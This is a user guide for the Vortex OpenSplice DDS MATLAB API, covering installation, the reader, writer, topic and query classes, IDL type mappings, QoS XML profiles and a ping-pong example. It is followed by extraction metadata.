INSTALLDIR/Vortex_v2/Device/VortexOpenSplice/6.8.1/HDE/x86_64.win64
- Run release.bat. (Type in “release.bat” at command line.)
2. Start MATLAB using the **SAME** command shell used in Step 1.
*NOTE: If MATLAB is **NOT** started from a command shell with the correct OSPL environment variables set, exceptions will occur when attempting to use DDS MATLAB classes.*
3. In MATLAB, navigate to file “Vortex_DDS_MATLAB_API.mltbx” by typing:
```
cd(fullfile(getenv('OSPL_HOME'), 'tools', 'matlab'))
```
4. Double click on the file “Vortex_DDS_MATLAB_API.mltbx”. This will bring up a dialog entitled Vortex_DDS_MATLAB_API. Select Install.
2.4 Examples
Example models have been provided in the examples folder.
Example: `/INSTALLDIR/Vortex_v2/Device/VortexOpenSplice/6.8.1/HDE/x86_64.linux/tools/matlab/examples/matlab`
The DDS MATLAB Integration provides a class library with custom classes to read and write data with DDS. The MATLAB DDS Classes are included in a Vortex package.
3.1 API Usage patterns
The typical usage pattern for the MATLAB API for Vortex DDS is the following:
- model your DDS topics using IDL
- using idlpp -l matlab to compile your IDL into MATLAB topic classes. See MATLAB Generation from IDL.
- start writing your MATLAB program using the MATLAB API for Vortex DDS.
The core classes you must use are Vortex.Topic and either Vortex.Reader or Vortex.Writer. Other classes may be required, especially if you need to adjust the Quality of Service (QoS) defaults. For details on setting QoS values with the API, see QoS Provider. The following list shows the sequence in which you would use the Vortex classes:
- If you require participant-level non-default QoS settings, create a Vortex.Participant instance. Pass the participant to subsequently created Vortex entities.
- Create one or more Vortex.Topic instances for the IDL topics your program will read or write.
- If you require publisher or subscriber level non-default QoS settings, create Vortex.Publisher and/or Vortex.Subscriber instances. Pass these to any created reader or writers. (The most common reason for changing publisher/subscriber QoS is to define non-default partitions.)
- Create Vortex.Reader and/or Vortex.Writer classes from the Vortex.Topic instances that you created.
- If you required data filtering, create Vortex.Query objects.
- Create the core of program, creating instances of your topic classes and writing them; or, reading data and processing it.
3.2 Vortex.Topic
The MATLAB Topic class represents a DDS topic type. The DDS topic corresponds to a single data type. In DDS, data is distributed by publishing and subscribing topic data samples.
For a DDS Topic type definition, a corresponding MATLAB class must be defined in the MATLAB workspace. This is either a class created by idlpp (see MATLAB Generation from IDL) or a manually created MATLAB class (see MATLAB without IDL). It is recommend that you create DDS Topic type definitions via IDL and idlpp.
API Examples
Create a Vortex DDS domain topic. Returns a topic instance, or throws a Vortex.DDSException if the topic cannot be created.
Create a topic named ‘Circle’ based on the DDS Topic type `ShapeType` with default participant and QoS:
```matlab
topic = Vortex.Topic('Circle', ?ShapeType);
```
**Note:** In MATLAB, references to classes such as `ShapeType` are created by prefixing them with a question mark (`?`). If the class is in a MATLAB package, then the fully qualified name must be used. For example: `ShapesDemo.Topics.ShapeType`.
Create the ‘Circle’ topic with an explicitly created participant:
```matlab
% dp: a Vortex.DomainParticipant instance
topic = Vortex.Topic(dp, 'Circle', ?ShapeType);
```
Create the ‘Circle’ topic with default participant and QoS profile:
```matlab
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
topic = Vortex.Topic('Circle', ?ShapeType, qosFileURI, qosProfile);
```
Create the ‘Circle’ topic with explicit participant and QoS profile:
```matlab
% dp: a Vortex.DomainParticipant instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
topic = Vortex.Topic(dp, 'Circle', ?ShapeType, qosFileURI, qosProfile);
```
### 3.3 Vortex.DomainParticipant
The `Vortex.DomainParticipant` class represents a DDS domain participant entity.
In DDS - “A domain participant represents the local membership of the application in a domain. A domain is a distributed concept that links all the applications able to communicate with each other. It represents a communication plane: only the publishers and subscribers attached to the same domain may interact.”
**Use of the Vortex.DomainParticipant class** is optional. The API provides a ‘default participant’, which is used if no explicit domain participant is provided. The default participant is created on first usage, and is disposed when MATLAB exits. Reasons for using an explicitly created domain participant are:
- to provide non-default QoS settings.
- to control the timing of participant creation and destruction.
**API Examples**
Create a Vortex DDS domain participant. Returns participant or throws a `Vortex.DDSException` if the participant cannot be created.
Create a domain participant in the default DDS domain (the one specified by the OSLP_URI environment variable):
```matlab
dp = Vortex.DomainParticipant();
```
Create a domain participant on domain, specifying a domain id:
```matlab
% domainId: an integer value
dp = Vortex.DomainParticipant(domainId);
```
**Note:** The underlying DCPS C99 API used by `Vortex.DomainParticipant` does not currently support this operation, and will result in a `Vortex.DDSException` being raised.
Create a participant on default domain with QoS profile:
```matlab
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
dp = Vortex.DomainParticipant(qosFileURI, qosProfile);
```
Create a participant on domain with QoS profile:
```matlab
% domainId: an integer value
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
dp = Vortex.DomainParticipant(domainId, qosFileURI, qosProfile);
```
### 3.4 Vortex.Publisher
The MATLAB `Vortex.Publisher` class represents a DDS publisher entity.
In DDS, a publisher is “an object responsible for data distribution. It may publish data of different data types.”
Use of the `Vortex.Publisher` class is optional. In its place, you can use a `Vortex.DomainParticipant` instance, or default to the default domain participant. Reasons for explicitly creating a `Vortex.Publisher` instance are:
- to specify non-default QoS settings, including specifying the DDS partition upon which samples are written.
- to control the timing of publisher creation and deletion.
**API Examples**
Create a DDS Publisher entity. Returns publisher or throws a `Vortex.DDSException` if the publisher cannot be created.
Create a default publisher with default participant:
```matlab
pub = Vortex.Publisher();
```
Create a publisher with an explicit participant:
```matlab
% dp: a Vortex.DomainParticipant instance
pub = Vortex.Publisher(dp);
```
Create default publisher with default participant and QoS profile:
```matlab
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
pub = Vortex.Publisher(qosFileURI, qosProfile);
```
Create a publisher with participant and QoS profile:
```matlab
% dp: a Vortex.DomainParticipant instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
pub = Vortex.Publisher(dp, qosFileURI, qosProfile);
```
### 3.5 Vortex.Writer
The MATLAB `Vortex.Writer` class represents a DDS data writer entity.
In DDS - “The DataWriter is the object the application must use to communicate to a publisher the existence and value of data-objects of a given type.”
A `Vortex.Writer` class is required in order to write data to a DDS domain. It may be explicitly attached to a DDS publisher or a DDS domain participant; or, it is implicitly attached to the default domain participant.
A `Vortex.Writer` class instance references an existing `Vortex.Topic` instance.
**API Examples**
Create a Vortex DDS domain writer. Returns writer or throws a `Vortex.DDSException` if the writer cannot be created.
Create a writer for a topic, in the default domain participant and default QoS settings:
```matlab
% topic: a Vortex.Topic instance
writer = Vortex.Writer(topic);
```
Create a writer within an explicitly specified publisher or domain participant:
```matlab
% pubOrDp: a Vortex.Publisher or Vortex.DomainParticipant instance
% topic: a Vortex.Topic instance
writer = Vortex.Writer(pubOrDp, topic);
```
Create writer for a topic with explicit QoS profile:
```matlab
% topic: a Vortex.Topic instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
writer = Vortex.Writer(topic, qosFileURI, qosProfile);
```
Create a writer with publisher or participant, topic and QoS profile:
```matlab
% pubOrDp: a Vortex.Publisher or Vortex.DomainParticipant instance
% topic: a Vortex.Topic instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
writer = Vortex.Writer(pubOrDp, topic, qosFileURI, qosProfile);
```
Write a ShapeType topic class instance to a writer:
```matlab
% writer: a Vortex.Writer instance
% ShapeType: a ‘topic class’ created manually or via IDLPP
data = ShapeType(); % create an object instance
% set data values...
data.color = ‘RED’;
% ... set other values ...
ddsStatus = writer.write(data);
```
**Note:** the returned status value is 0 for success, and negative for failure. Use the Vortex.DDSException class to decode an failure status.
Dispose a DDS topic instance:
```matlab
% writer: a Vortex.Writer instance
% ShapeType: a ‘topic class’ created manually or via IDLPP
data = ShapeType(); % create an object instance
% set data key values...
data.color = ‘RED’;
ddsStatus = writer.dispose(data);
```
**Note:** the returned status value is 0 for success, and negative for failure. Use the Vortex.DDSException class to decode an failure status.
Unregister a DDS topic instance:
```matlab
% writer: a Vortex.Writer instance
% ShapeType: a ‘topic class’ created manually or via IDLPP
data = ShapeType(); % create an object instance
% set data key values...
data.color = ‘RED’;
ddsStatus = writer.unregister(data);
```
**Note:** the returned status value is 0 for success, and negative for failure. Use the Vortex.DDSException class to decode an failure status.
3.6 Vortex.Subscriber
The MATLAB Vortex.Subscriber class represents a DDS subscriber entity. In DDS, a subscriber is “an object responsible for receiving published data and making it available to the receiving application. It may receive and dispatch data of different specified types.”
Use of the Vortex.Subscriber class is optional. In its place, you can use a Vortex.DomainParticipant instance, or default to the default domain participant. Reasons for explicitly creating a Vortex.Subscriber instance are:
- to specify non-default QoS settings, including specifying the DDS partition upon which samples are written.
- to control the timing of subscriber creation and deletion.
API Examples
Create a Vortex DDS domain subscriber. Returns subscriber or throw a Vortex.DDSException if the subscriber cannot be created.
Create a subscriber within the default domain participant:
```matlab
sub = Vortex.Subscriber();
```
Create a subscriber within an explicit participant:
```matlab
% dp: a Vortex.DomainParticipant instance
sub = Vortex.Subscriber(dp);
```
Create subscriber within the default domain participant and with a QoS profile:
```matlab
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
sub = Vortex.Subscriber(qosFileURI, qosProfile);
```
Create a subscriber with participant and QoS profile:
```matlab
% dp: a Vortex.DomainParticipant instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
sub = Vortex.Subscriber(dp, qosFileURI, qosProfile);
```
3.7 Vortex.Reader
The MATLAB Vortex.Reader class represents a DDS data reader entity. In DDS - “To access the received data, the application must use a typed DataReader attached to the subscriber.”
A Vortex.Reader class is required in order to write data to a DDS domain. It may be explicitly attached to a DDS subscriber or a DDS domain participant; or, it is implicitly attached to the default domain participant.
A Vortex.Reader class instance references an existing Vortex.Topic instance.
API Examples
Create a Vortex DDS domain reader. Returns reader or throw a Vortex.DDSException instance if the reader cannot be created.
Create a reader for a topic within the default domain participant, and with default QoS:
```matlab
% topic: a Vortex.Topic instance
reader = Vortex.Reader(topic);
```
Create a reader for a topic within a subscriber or participant, and with default QoS:
% subOrDp: a Vortex.Subscriber or Vortex.DomainParticipant instance
% topic: a Vortex.Topic instance
reader = Vortex.Reader(subOrDp, topic);
Create reader for a topic within the default domain participant and with a QoS profile:
% topic: a Vortex.Topic instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
reader = Vortex.Reader(topic, qosFileURI, qosProfile);
Create a reader for a topic within a subscriber or participant, with a QoS profile:
% subOrDp: a Vortex.Subscriber or Vortex.DomainParticipant instance
% topic: a Vortex.Topic instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
reader = Vortex.Reader(subOrDp, topic, qosFileURI, qosProfile);
Take data from a data reader:
% reader: a Vortex.Reader
[data, dataState] = reader.take;
% data: an array of topic class instances (e.g. ShapeType); possibly empty
% dataState: an struct array; each entry describes the
% state of the corresponding data entry
Read data from a data reader:
% reader: a Vortex.Reader
[data, dataState] = reader.read;
% data: an array of topic class instances (e.g. ShapeType); possibly empty
% dataState: an struct array; each entry describes the
% state of the corresponding data entry
Specify a wait timeout, in seconds, before read or take will return without receiving data:
% reader: a Vortex.Reader
reader.waitsetTimeout(2.0);
3.8 Vortex.Query
The MATLAB Vortex.Query class represents a DDS query entity.
A query is a data reader, restricted to accessing data that matches specific status conditions and/or a filter expression.
A Vortex.Query class instance references an existing Vortex.Reader instance.
API Examples
Create a Vortex.Query instance or throw a Vortex.DDSException if an error occurs.
Create a query based on a state mask only:
% reader: a Vortex.Reader
% only receive samples that:
% * have not been read by this application
% * AND for instances that previously seen by this application
% * AND for which there is a live writer
mask = Vortex.DataState.withNew().withNotRead().withAlive();
query = Vortex.Query(reader, mask);
Create a query based on a state mask and a filter expression:
% reader: a Vortex.Reader
mask = Vortex.DataState.withAnyState();
filter = 'color = %0 and x > %1';
% filter for 'RED' shapes with x > 10...
query = Vortex.Query(reader, mask, filter, {'RED', 10'});
Take data from a query:
% query: a Vortex.Query
[data, dataState] = query.take;
% data: an array of topic class instances (e.g. ShapeType); possibly empty
% dataState: an struct array; each entry describes the
% state of the corresponding data entry
Read data from a query:
% query: a Vortex.Query
[data, dataState] = query.read;
% data: an array of topic class instances (e.g. ShapeType); possibly empty
% dataState: an struct array; each entry describes the
% state of the corresponding data entry
Specify a wait timeout, in seconds, before read or take will return without receiving data:
% query: a Vortex.Query
% specify the waitset timeout on the reader
query.waitsetTimeout(2.0);
% now, read or take 'query'
3.9 Vortex.DDSException
The Vortex.DDSException class is thrown in the case of a DDS error arising. The class can also be used to decode an error status code returned by methods such as Vortex.Writer.write.
API Examples
Catch a DDS error while creating a DDS entity:
% dp: a Vortex.DomainParticipant
try
topic = Vortex.topic('Circle', ?SomeAlternateDef.ShapeType);
catch ex
switch ex.identifier
case 'Vortex:DDSError'
% it's a Vortex Error
fprintf(['DDS reports error:
' ...
' %s
' ...
' DDS ret code: %s (%d)
'], ex.message, char(ex.dds_ret_code), ex.dds_ret_code);
otherwise
rethrow ex;
end
end
Decode a dds status code returned by Vortex.Writer.write:
% ddsstatus: a Vortex.Writer.write return value
ex = Vortex.DDSException('', ddsstatus);
switch ex.dds_ret_code
case Vortex.DDSReturnCode.DDS_RETCODE_OK
case Vortex.DDSReturnCode.DDS_BAD_PARAMETER
% ...
end
case Vortex.DDSReturnCode.DDS_RETCODE_INCONSISTENT_POLICY
% ...
end
MATLAB Generation from IDL
The DDS MATLAB Integration supports generation of MATLAB classes from IDL. This chapter describes the details of the IDL-MATLAB binding.
4.1 Running IDLPP
Compiling IDL into MATLAB code is done using the -l matlab switch on idlpp:
```
idlpp -l matlab idl-file-to-compile.idl
```
Generated Artifacts
The following table defines the MATLAB artifacts generated from IDL concepts:
<table>
<thead>
<tr>
<th>IDL Concept</th>
<th>MATLAB Concept</th>
<th>Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td>module</td>
<td>package</td>
<td>a MATLAB package is a folder starting with <code>+</code>.</td>
</tr>
<tr>
<td>enum</td>
<td>class</td>
<td>a MATLAB .m file.</td>
</tr>
<tr>
<td>enum value</td>
<td>enum value</td>
<td></td>
</tr>
<tr>
<td>struct</td>
<td>class</td>
<td>a MATLAB .m file.</td>
</tr>
<tr>
<td>field</td>
<td>class property</td>
<td></td>
</tr>
<tr>
<td>typedef</td>
<td>Unsupported</td>
<td>IDL typedef's are inlined.</td>
</tr>
<tr>
<td>union</td>
<td>Unsupported</td>
<td></td>
</tr>
<tr>
<td>inheritance</td>
<td>Unsupported</td>
<td></td>
</tr>
</tbody>
</table>
Datatype mappings
The following table shows the MATLAB equivalents to IDL primitive types:
<table>
<thead>
<tr>
<th>IDL Type</th>
<th>MATLAB Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>boolean</td>
<td>logical</td>
</tr>
<tr>
<td>char</td>
<td>int8</td>
</tr>
<tr>
<td>octet</td>
<td>uint8</td>
</tr>
<tr>
<td>short</td>
<td>int16</td>
</tr>
<tr>
<td>ushort</td>
<td>uint16</td>
</tr>
<tr>
<td>long</td>
<td>int32</td>
</tr>
<tr>
<td>ulong</td>
<td>uint32</td>
</tr>
<tr>
<td>long long</td>
<td>int64</td>
</tr>
<tr>
<td>ulong long</td>
<td>uint64</td>
</tr>
<tr>
<td>float</td>
<td>single</td>
</tr>
<tr>
<td>double</td>
<td>double</td>
</tr>
<tr>
<td>string</td>
<td>char</td>
</tr>
<tr>
<td>wchar</td>
<td>Unsupported</td>
</tr>
<tr>
<td>wstring</td>
<td>Unsupported</td>
</tr>
<tr>
<td>any</td>
<td>Unsupported</td>
</tr>
<tr>
<td>long double</td>
<td>Unsupported</td>
</tr>
</tbody>
</table>
Implementing Arrays and Sequences in MATLAB
Both IDL arrays and IDL sequences are mapped to MATLAB arrays. MATLAB supports both native array types, which must have homogenenous contents and cell arrays, which may have heterogenous content. In general, IDLPP prefers native arrays, as they support more straight forward type checking. However, some situations require cell arrays. The following table summarizes the cases where IDLPP will generate cell arrays:
<table>
<thead>
<tr>
<th>Datatype</th>
<th>Sample Syntax</th>
<th>Reason for using cell array</th>
</tr>
</thead>
<tbody>
<tr>
<td>sequence of sequence</td>
<td>sequence<sequence<T>>; f;</td>
<td>Nested sequences need not have a homogeneous length</td>
</tr>
<tr>
<td>array of sequence</td>
<td>sequence<T> f[N];</td>
<td>Sequences lengths need not be homogeneous</td>
</tr>
<tr>
<td>sequence of array</td>
<td>sequence<A> f;</td>
<td>A multi-dim array makes adding elements too difficult</td>
</tr>
<tr>
<td>sequence of string</td>
<td>sequence<string> f;</td>
<td>Nested strings need not have a homogeneous length</td>
</tr>
<tr>
<td>string array</td>
<td>string f[N];</td>
<td>Nested strings need not have a homogeneous length</td>
</tr>
</tbody>
</table>
### 4.2 Limitations of MATLAB Support
The IDL-to-MATLAB binding has the following limitations:
- IDL unions are not supported
- the following IDL data types are not supported: wchar, wstring, any and long double
- arrays of sequences of structures are not supported
It is possible, but not recommended, to directly create MATLAB classes that represent DDS topics. This approach allows you to quickly start using Vortex DDS, but it has a number of disadvantages:
- without IDL, you cannot reliably define the topic in other language bindings.
- not all IDL types are available.
### 5.1 Creating a MATLAB Topic class
To create a Topic Class without IDL, create a MATLAB class that inherits from Vortex.AbstractType. The class will be interpreted as an IDL struct. Class properties will be interpreted as IDL struct fields. Finally, the class must define a static method `getKey` which returns a comma separated list of key fields for the topic.
The following shows a simple MATLAB class, `ShapeType`:
```matlab
classdef ShapeType < Vortex.AbstractType
properties
color char % IDL: string color;
x int32 % IDL: long x;
y int32 % IDL: long y;
shapesize int32 % IDL: long shapesize;
end
methods (Static)
function keys = getKey
keys = 'color';
end
end
end
```
The topic class defines four fields, and identifies the `color` field as the topic key.
You would use the topic class in the same way as one generated by IDLPP. The following example shows the creation of a DDS topic object from a topic class:
```matlab
% define a Vortex DDS topic called ‘Circle’
circleTopic = Vortex.Topic(‘Circle’, ?ShapeType);
```
With the `circleTopic` variable, you can then create appropriate Vortex DDS readers and writers.
### 5.2 Mapping of MATLAB types to IDL types
When using an IDL-less Topic class, the Vortex DDS API for MATLAB makes maps property types to IDL types as follows:
<table>
<thead>
<tr>
<th>MATLAB Type</th>
<th>IDL Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>logical</td>
<td>boolean</td>
</tr>
<tr>
<td>int8</td>
<td>char</td>
</tr>
<tr>
<td>uint8</td>
<td>octet</td>
</tr>
<tr>
<td>int16</td>
<td>short</td>
</tr>
<tr>
<td>uint16</td>
<td>unsigned short</td>
</tr>
<tr>
<td>int32</td>
<td>long</td>
</tr>
<tr>
<td>uint32</td>
<td>unsigned long</td>
</tr>
<tr>
<td>int64</td>
<td>long long</td>
</tr>
<tr>
<td>uint64</td>
<td>unsigned long long</td>
</tr>
<tr>
<td>single</td>
<td>float</td>
</tr>
<tr>
<td>double</td>
<td>double</td>
</tr>
<tr>
<td>char</td>
<td>string</td>
</tr>
<tr>
<td>class</td>
<td>equivalent IDL struct</td>
</tr>
<tr>
<td>enum class</td>
<td>equivalent IDL enum</td>
</tr>
<tr>
<td>not type</td>
<td>double</td>
</tr>
</tbody>
</table>
### 5.3 Creating arrays
When defining a topic class, you can make a field map to an IDL array by initializing it to an array of the appropriate dimensions. The MATLAB API for Vortex DDS recognizes arrays of most types as identifying IDL arrays. The one exception is that arrays of MATLAB `char` are still interpreted as an IDL string.
The following example shows an topic class that defines arrays:
```matlab
classdef ArrayTopic < Vortex.AbstractType
properties
x = zeros([1 4]) %IDL: double x[4];
y int32 = zeros([3 4]) %IDL: long y[3][4];
end
methods (Static)
function keys = getKey
keys = ''; %No Key
end
end
end
```
### 5.4 Unsupported Types
When creating topics with out IDL, you must accept the following restrictions:
- IDL sequences cannot be defined.
- arrays of IDL strings cannot be defined.
- bounded IDL strings cannot be defined.
6
QoS Provider
The following section explains how the QoS is set for a DDS entity using the QoS Provider.
6.1 QoS Provider File
Quality of Service for DDS entities is set using XML files based on the XML schema file QoSProfile.xsd. These XML files contain one or more QoS profiles for DDS entities. An example with a default QoS profile for all entity types can be found at DDS_DefaultQoS.xml.
Note: Sample QoS Profile XML files can be found in the examples directories.
6.2 QoS Profile
A QoS profile consists of a name and optionally a base_name attribute. The base_name attribute allows a QoS or a profile to inherit values from another QoS or profile in the same file. The file contains QoS elements for one or more DDS entities. A skeleton file without any QoS values is displayed below to show the structure of the file.
```xml
<qos_profile name="DDS QoS Profile Name">
<datareader_qos/>
<datawriter_qos/>
<domainparticipant_qos/>
<subscriber_qos/>
<publisher_qos/>
<topic_qos/>
</qos_profile>
</dds>
```
Example: Specify Publisher Partition
The example below specifies the publisher’s partitions as A and B.
```xml
<publisher_qos>
<partition>
<name>
<element>A</element>
<element>B</element>
<name>
</partition>
</publisher_qos>
```
6.3 Setting QoS Profile in MATLAB
To set the QoS profile for a DDS entity in MATLAB the user must specify the File URI and the QoS profile name. If the file is not specified, the DDS entity will be created with the default QoS values.
% QOS File
PINGER_QOS_FILE = '/home/dds/matlab_examples/pingpong/DDS_PingerVolatileQoS.xml';
PINGER_QOS_PROFILE = 'DDS VolatileQosProfile';
% create the pinger participant on default domain with specified qos profile
dp = Vortex.DomainParticipant([{'file://', PINGER_QOS_FILE}, PINGER_QOS_PROFILE]);
The file for the above would minimally contain the following <domainparticipant_qos> tag.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<qos_profile name="DDS VolatileQosProfile">
<domainparticipant_qos>
<user_data>
<value></value>
</user_data>
<entity_factory>
<autoenable_created_entities>true</autoenable_created_entities>
</entity_factory>
</domainparticipant_qos>
</qos_profile>
</dds>
```
Ping Pong Example
A simple ping pong example is provided to demonstrate the basic capabilities of the MATLAB DDS integration. The ping pong example can be found in the following directory:
```
OSPL_HOME/tools/matlab/examples/matlab/pingpong
```
The ping pong example creates two participants:
1. A pinger that writes to the PING partition and reads from the PONG partition.
2. A ponger that writes to the PONG partition and reads from the PING partition.
A matlab script is provided that writes and reads sample data in the pinger and ponger participants.
### 7.1 Example Files
Files with the .m extension are MATLAB script files.
An explanation of what each example file does is provided below.
**pingpong.idl**
- Defines the PingPongType in idl
- Used to generate the MATLAB file PingPongType.m via:
```
idlpp -l matlab pingpong.idl
```
**PingPongType.m**
- Defines a PingPongType; generated from idlpp
- The PingPongType represents a DDS topic type.
- PingPongType specifies two properties: id, count.
**DDS_PingerVolatileQoS.xml**
- XML file that specifies the DDS QoS (quality of service) settings for pinger.
**DDS_PongerVolatileQoS.xml**
- XML file that specifies the DDS QoS (quality of service) settings for ponger.
**setup_pinger.m**
- Creates the pinger participant on the default DDS domain, with specified QoS profile.
- Creates the topic PingPongType.
- Creates the publisher using the domain participant on the PING partition specified in the specified QoS profile.
- Creates the writer using the publisher and the specified QoS profile.
- Creates the subscriber using the domain participant on the PONG partition specified in the QoS profile.
• Creates the reader using the subscriber and the specified QoS profile.
**setup_ponger.m**
• Creates the ponger participant on default domain with specified QoS profile.
• Creates the topic PingPongType.
• Creates the publisher using the domain participant on the PONG partition specified in the QoS profile.
• Creates the writer using the publisher and the specified QoS profile.
• Creates the subscriber using the domain participant on the PING partition specified in the QoS profile.
• Creates the reader using the subscriber and the specified QoS profile.
**pinger_ponger.m**
• MATLAB script that writes and reads sample data in the pinger and ponger participants.
• This script calls the setup_pinger.m and setup_ponger.m scripts.
• This is the main script to run the ping pong example.
• This script is run from the MATLAB Command Window.
### 7.2 Steps to run example
1. **In the MATLAB command window, run `pinger_ponger.m`**.
• Type “pinger_ponger”.
• Hit enter.
8
Contacts & Notices
8.1 Contacts
ADLINK Technology Corporation
400 TradeCenter
Suite 5900
Woburn, MA
01801
USA
Tel: +1 781 569 5819
ADLINK Technology Limited
The Edge
5th Avenue
Team Valley
Gateshead
NE11 0XA
UK
Tel: +44 (0)191 497 9900
ADLINK Technology SARL
28 rue Jean Rostand
91400 Orsay
France
Tel: +33 (1) 69 015354
Web: http://ist.adlinktech.com/
Contact: http://ist.adlinktech.com
E-mail: ist_info@adlinktech.com
LinkedIn: https://www.linkedin.com/company/79111/
Twitter: https://twitter.com/ADLINKTech_usa
Facebook: https://www.facebook.com/ADLINKTECH
8.2 Notices
Copyright © 2019 ADLINK Technology Limited. All rights reserved.
This document may be reproduced in whole but not in part. The information contained in this document is subject to change without notice and is made available in good faith without liability on the part of ADLINK Technology Limited. All trademarks acknowledged.
|
{"Source-Url": "http://download.prismtech.com/docs/Vortex/pdfs/OpenSplice_DDSMATLABGuide.pdf", "len_cl100k_base": 8421, "olmocr-version": "0.1.53", "pdf-total-pages": 24, "total-fallback-pages": 0, "total-input-tokens": 42049, "total-output-tokens": 9298, "length": "2e13", "weborganizer": {"__label__adult": 0.00022709369659423828, "__label__art_design": 0.0003838539123535156, "__label__crime_law": 0.0002503395080566406, "__label__education_jobs": 0.000698089599609375, "__label__entertainment": 8.761882781982422e-05, "__label__fashion_beauty": 0.00011593103408813477, "__label__finance_business": 0.00037169456481933594, "__label__food_dining": 0.00024259090423583984, "__label__games": 0.000644683837890625, "__label__hardware": 0.0016231536865234375, "__label__health": 0.00021708011627197263, "__label__history": 0.0001829862594604492, "__label__home_hobbies": 9.101629257202148e-05, "__label__industrial": 0.0006308555603027344, "__label__literature": 0.0001277923583984375, "__label__politics": 0.00018799304962158203, "__label__religion": 0.00030803680419921875, "__label__science_tech": 0.058837890625, "__label__social_life": 9.310245513916016e-05, "__label__software": 0.062408447265625, "__label__software_dev": 0.87158203125, "__label__sports_fitness": 0.00021851062774658203, "__label__transportation": 0.00035190582275390625, "__label__travel": 0.00015783309936523438}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 33639, 0.01929]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 33639, 0.72413]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 33639, 0.66308]], "google_gemma-3-12b-it_contains_pii": [[0, 30, false], [30, 30, null], [30, 1001, null], [1001, 2446, null], [2446, 3647, null], [3647, 4351, null], [4351, 6647, null], [6647, 9600, null], [9600, 12126, null], [12126, 14494, null], [14494, 17033, null], [17033, 19321, null], [19321, 21093, null], [21093, 21216, null], [21216, 22837, null], [22837, 24348, null], [24348, 26034, null], [26034, 27498, null], [27498, 29174, null], [29174, 30061, null], [30061, 31747, null], [31747, 32731, null], [32731, 33378, null], [33378, 33639, null]], "google_gemma-3-12b-it_is_public_document": [[0, 30, true], [30, 30, null], [30, 1001, null], [1001, 2446, null], [2446, 3647, null], [3647, 4351, null], [4351, 6647, null], [6647, 9600, null], [9600, 12126, null], [12126, 14494, null], [14494, 17033, null], [17033, 19321, null], [19321, 21093, null], [21093, 21216, null], [21216, 22837, null], [22837, 24348, null], [24348, 26034, null], [26034, 27498, null], [27498, 29174, null], [29174, 30061, null], [30061, 31747, null], [31747, 32731, null], [32731, 33378, null], [33378, 33639, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 33639, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 33639, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 33639, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 33639, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 33639, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 33639, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 33639, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 33639, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 33639, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 33639, null]], "pdf_page_numbers": [[0, 30, 1], [30, 30, 2], [30, 1001, 3], [1001, 2446, 4], [2446, 3647, 5], [3647, 4351, 6], [4351, 6647, 7], [6647, 9600, 8], [9600, 12126, 9], [12126, 14494, 10], [14494, 17033, 11], [17033, 19321, 12], [19321, 21093, 13], [21093, 21216, 14], [21216, 22837, 15], [22837, 24348, 16], [24348, 26034, 17], [26034, 27498, 18], [27498, 29174, 19], [29174, 30061, 20], [30061, 31747, 21], [31747, 32731, 22], [32731, 33378, 23], [33378, 33639, 24]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 33639, 0.08414]]}
|
olmocr_science_pdfs
|
2024-12-11
|
2024-12-11
|
524b18fa9fb61ce32f57a3787c1ea26575455465
|
[REMOVED]
|
{"len_cl100k_base": 14433, "olmocr-version": "0.1.53", "pdf-total-pages": 19, "total-fallback-pages": 0, "total-input-tokens": 63228, "total-output-tokens": 17373, "length": "2e13", "weborganizer": {"__label__adult": 0.00034689903259277344, "__label__art_design": 0.00029850006103515625, "__label__crime_law": 0.0003287792205810547, "__label__education_jobs": 0.0007519721984863281, "__label__entertainment": 5.984306335449219e-05, "__label__fashion_beauty": 0.00014901161193847656, "__label__finance_business": 0.00014078617095947266, "__label__food_dining": 0.00033664703369140625, "__label__games": 0.0007686614990234375, "__label__hardware": 0.0009627342224121094, "__label__health": 0.0004992485046386719, "__label__history": 0.00023984909057617188, "__label__home_hobbies": 8.761882781982422e-05, "__label__industrial": 0.0003364086151123047, "__label__literature": 0.0002930164337158203, "__label__politics": 0.0002187490463256836, "__label__religion": 0.0004646778106689453, "__label__science_tech": 0.023406982421875, "__label__social_life": 8.088350296020508e-05, "__label__software": 0.00626373291015625, 